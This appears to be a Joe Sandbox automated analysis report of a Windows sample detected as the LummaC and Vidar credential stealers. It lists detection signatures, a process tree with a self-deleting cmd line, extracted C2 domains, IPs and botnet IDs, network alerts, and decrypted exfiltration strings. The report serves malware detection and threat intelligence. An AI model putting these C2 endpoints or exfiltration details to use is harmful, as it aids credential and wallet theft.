Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1524788
MD5:7b5e8e3db2ce9c97f6a8214a4ccd3872
SHA1:e26cc5d9f9489593ae727a3358602d7b963f7f59
SHA256:59776469143431b5ddf203e169ed86915ff04fff5ff8e7231a53472c043eabf4
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5888 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7B5E8E3DB2CE9C97F6A8214A4CCD3872)
    • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 6880 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • ECBKKKFHCF.exe (PID: 4460 cmdline: "C:\ProgramData\ECBKKKFHCF.exe" MD5: BE9E376D9BAB656B145A7C8316636903)
        • conhost.exe (PID: 5884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 3300 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 5388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • cmd.exe (PID: 4776 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJJKKJJDAAAA" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 5012 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["soldiefieop.site", "chorusarorp.site", "abnomalrkmu.site", "mysterisop.site", "snarlypagowo.site", "questionsmw.stor", "absorptioniw.site", "treatynreit.site"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "bb7310eab4245006f125c442da2d1e50"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                Click to see the 9 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.file.exe.4195570.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  0.2.file.exe.4195570.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    3.2.RegAsm.exe.400000.2.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      3.2.RegAsm.exe.400000.2.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                        3.2.RegAsm.exe.400000.2.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          Click to see the 3 entries

                          Sigma Signatures

                          No Sigma rule has matched

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:09.033709+020020287653Unknown Traffic192.168.2.64972149.12.197.9443TCP
                          2024-10-03T09:16:10.269242+020020287653Unknown Traffic192.168.2.64972249.12.197.9443TCP
                          2024-10-03T09:16:11.603749+020020287653Unknown Traffic192.168.2.64972349.12.197.9443TCP
                          2024-10-03T09:16:12.968759+020020287653Unknown Traffic192.168.2.64972449.12.197.9443TCP
                          2024-10-03T09:16:14.315886+020020287653Unknown Traffic192.168.2.64972549.12.197.9443TCP
                          2024-10-03T09:16:15.778102+020020287653Unknown Traffic192.168.2.64972649.12.197.9443TCP
                          2024-10-03T09:16:16.769528+020020287653Unknown Traffic192.168.2.64972749.12.197.9443TCP
                          2024-10-03T09:16:19.708106+020020287653Unknown Traffic192.168.2.64972849.12.197.9443TCP
                          2024-10-03T09:16:20.784635+020020287653Unknown Traffic192.168.2.64972949.12.197.9443TCP
                          2024-10-03T09:16:21.921444+020020287653Unknown Traffic192.168.2.64973049.12.197.9443TCP
                          2024-10-03T09:16:23.148932+020020287653Unknown Traffic192.168.2.64973149.12.197.9443TCP
                          2024-10-03T09:16:24.833934+020020287653Unknown Traffic192.168.2.64973249.12.197.9443TCP
                          2024-10-03T09:16:26.539409+020020287653Unknown Traffic192.168.2.64973349.12.197.9443TCP
                          2024-10-03T09:16:28.113677+020020287653Unknown Traffic192.168.2.64973549.12.197.9443TCP
                          2024-10-03T09:16:29.539542+020020287653Unknown Traffic192.168.2.64973649.12.197.9443TCP
                          2024-10-03T09:16:30.799417+020020287653Unknown Traffic192.168.2.64973749.12.197.9443TCP
                          2024-10-03T09:16:33.915638+020020287653Unknown Traffic192.168.2.64973849.12.197.9443TCP
                          2024-10-03T09:16:35.365919+020020287653Unknown Traffic192.168.2.64973949.12.197.9443TCP
                          2024-10-03T09:16:36.749671+020020287653Unknown Traffic192.168.2.64974049.12.197.9443TCP
                          2024-10-03T09:16:38.133675+020020287653Unknown Traffic192.168.2.64974249.12.197.9443TCP
                          2024-10-03T09:16:40.196938+020020287653Unknown Traffic192.168.2.64974349.12.197.9443TCP
                          2024-10-03T09:16:42.018642+020020287653Unknown Traffic192.168.2.64974449.12.197.9443TCP
                          2024-10-03T09:16:44.699283+020020287653Unknown Traffic192.168.2.64974649.12.197.9443TCP
                          2024-10-03T09:16:46.483948+020020287653Unknown Traffic192.168.2.64974949.12.197.9443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:45.424799+020020546531A Network Trojan was detected192.168.2.649747172.67.208.141443TCP
                          2024-10-03T09:16:46.376230+020020546531A Network Trojan was detected192.168.2.649748188.114.96.3443TCP
                          2024-10-03T09:16:47.369794+020020546531A Network Trojan was detected192.168.2.649750172.67.152.190443TCP
                          2024-10-03T09:16:49.332498+020020546531A Network Trojan was detected192.168.2.649752104.21.84.18443TCP
                          2024-10-03T09:16:50.284294+020020546531A Network Trojan was detected192.168.2.649753104.21.18.193443TCP
                          2024-10-03T09:16:51.296261+020020546531A Network Trojan was detected192.168.2.649754104.21.21.3443TCP
                          2024-10-03T09:16:52.326685+020020546531A Network Trojan was detected192.168.2.649755104.21.17.174443TCP
                          2024-10-03T09:16:54.882156+020020546531A Network Trojan was detected192.168.2.649757104.21.16.12443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:45.424799+020020498361A Network Trojan was detected192.168.2.649747172.67.208.141443TCP
                          2024-10-03T09:16:46.376230+020020498361A Network Trojan was detected192.168.2.649748188.114.96.3443TCP
                          2024-10-03T09:16:47.369794+020020498361A Network Trojan was detected192.168.2.649750172.67.152.190443TCP
                          2024-10-03T09:16:49.332498+020020498361A Network Trojan was detected192.168.2.649752104.21.84.18443TCP
                          2024-10-03T09:16:50.284294+020020498361A Network Trojan was detected192.168.2.649753104.21.18.193443TCP
                          2024-10-03T09:16:51.296261+020020498361A Network Trojan was detected192.168.2.649754104.21.21.3443TCP
                          2024-10-03T09:16:52.326685+020020498361A Network Trojan was detected192.168.2.649755104.21.17.174443TCP
                          2024-10-03T09:16:54.882156+020020498361A Network Trojan was detected192.168.2.649757104.21.16.12443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:46.889929+020020563931Domain Observed Used for C2 Detected192.168.2.649750172.67.152.190443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:51.879056+020020563951Domain Observed Used for C2 Detected192.168.2.649755104.21.17.174443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:50.829425+020020564011Domain Observed Used for C2 Detected192.168.2.649754104.21.21.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:44.968580+020020564031Domain Observed Used for C2 Detected192.168.2.649747172.67.208.141443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:49.860301+020020564071Domain Observed Used for C2 Detected192.168.2.649753104.21.18.193443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:45.922882+020020564091Domain Observed Used for C2 Detected192.168.2.649748188.114.96.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:47.877600+020020564111Domain Observed Used for C2 Detected192.168.2.649752104.21.84.18443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:48.158642+020020544951A Network Trojan was detected192.168.2.64975145.132.206.25180TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:46.380069+020020563921Domain Observed Used for C2 Detected192.168.2.6581181.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:51.323427+020020563941Domain Observed Used for C2 Detected192.168.2.6599781.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:44.433969+020020563961Domain Observed Used for C2 Detected192.168.2.6539501.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:50.297622+020020564001Domain Observed Used for C2 Detected192.168.2.6510961.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:44.478276+020020564021Domain Observed Used for C2 Detected192.168.2.6655071.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:49.334787+020020564061Domain Observed Used for C2 Detected192.168.2.6590231.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:45.430241+020020564081Domain Observed Used for C2 Detected192.168.2.6530421.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:47.376100+020020564101Domain Observed Used for C2 Detected192.168.2.6652261.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:13.666323+020020442471Malware Command and Control Activity Detected49.12.197.9443192.168.2.649724TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:15.020448+020020518311Malware Command and Control Activity Detected49.12.197.9443192.168.2.649725TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:13.666117+020020490871A Network Trojan was detected192.168.2.64972449.12.197.9443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-10-03T09:16:43.416365+020028032702Potentially Bad Traffic192.168.2.649745147.45.44.10480TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for URL or domain
                          Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
                          Found malware configuration
                          Source: 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "bb7310eab4245006f125c442da2d1e50"}
                          Source: 10.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["soldiefieop.site", "chorusarorp.site", "abnomalrkmu.site", "mysterisop.site", "snarlypagowo.site", "questionsmw.stor", "absorptioniw.site", "treatynreit.site"], "Build id": "H8NgCl--"}
                          Multi AV Scanner detection for domain / URL
                          Source: questionsmw.storeVirustotal: Detection: 10%Perma Link
                          Source: gravvitywio.storeVirustotal: Detection: 8%Perma Link
                          Source: cowod.hopto.orgVirustotal: Detection: 7%Perma Link
                          Source: https://49.12.197.9/Virustotal: Detection: 10%Perma Link
                          Source: https://soldiefieop.site/apiVirustotal: Detection: 13%Perma Link
                          Source: https://abnomalrkmu.site/apiVirustotal: Detection: 12%Perma Link
                          Source: http://cowod.hopto.orgVirustotal: Detection: 7%Perma Link
                          Source: https://mysterisop.site/apiVirustotal: Detection: 13%Perma Link
                          Source: https://49.12.197.9/sqlp.dllVirustotal: Detection: 11%Perma Link
                          Source: https://gravvitywio.store/apijVirustotal: Detection: 6%Perma Link
                          Source: https://49.12.197.9Virustotal: Detection: 10%Perma Link
                          Source: https://mysterisop.site/piVirustotal: Detection: 7%Perma Link
                          Multi AV Scanner detection for dropped file
                          Source: C:\ProgramData\ECBKKKFHCF.exeReversingLabs: Detection: 34%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66fe13d251bbf_lsod[1].exeReversingLabs: Detection: 34%
                          Multi AV Scanner detection for submitted file
                          Source: file.exeVirustotal: Detection: 27%Perma Link
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Sample uses string decryption to hide its real strings
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: absorptioniw.site
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: mysterisop.site
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: snarlypagowo.site
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: treatynreit.site
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: chorusarorp.site
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abnomalrkmu.site
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: soldiefieop.site
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: questionsmw.stor
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: chorusarorp.site
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                          Source: 0000000A.00000002.2868139732.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: H8NgCl--
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,3_2_004080A1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,3_2_00408048
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,3_2_00411E5D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,3_2_0040A7D8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C616C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,3_2_6C616C80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C76A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,3_2_6C76A9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C764440 PK11_PrivDecrypt,3_2_6C764440
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C734420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,3_2_6C734420
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49720 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.6:49721 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.208.141:443 -> 192.168.2.6:49747 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49748 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.152.190:443 -> 192.168.2.6:49750 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.84.18:443 -> 192.168.2.6:49752 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.18.193:443 -> 192.168.2.6:49753 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.21.3:443 -> 192.168.2.6:49754 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.17.174:443 -> 192.168.2.6:49755 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49756 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.16.12:443 -> 192.168.2.6:49757 version: TLS 1.2
                          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: .pdb ? source: file.exe
                          Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2827920795.000000003864F000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2821875809.000000002C764000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: .pdb source: 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.dr
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,3_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040BF4D
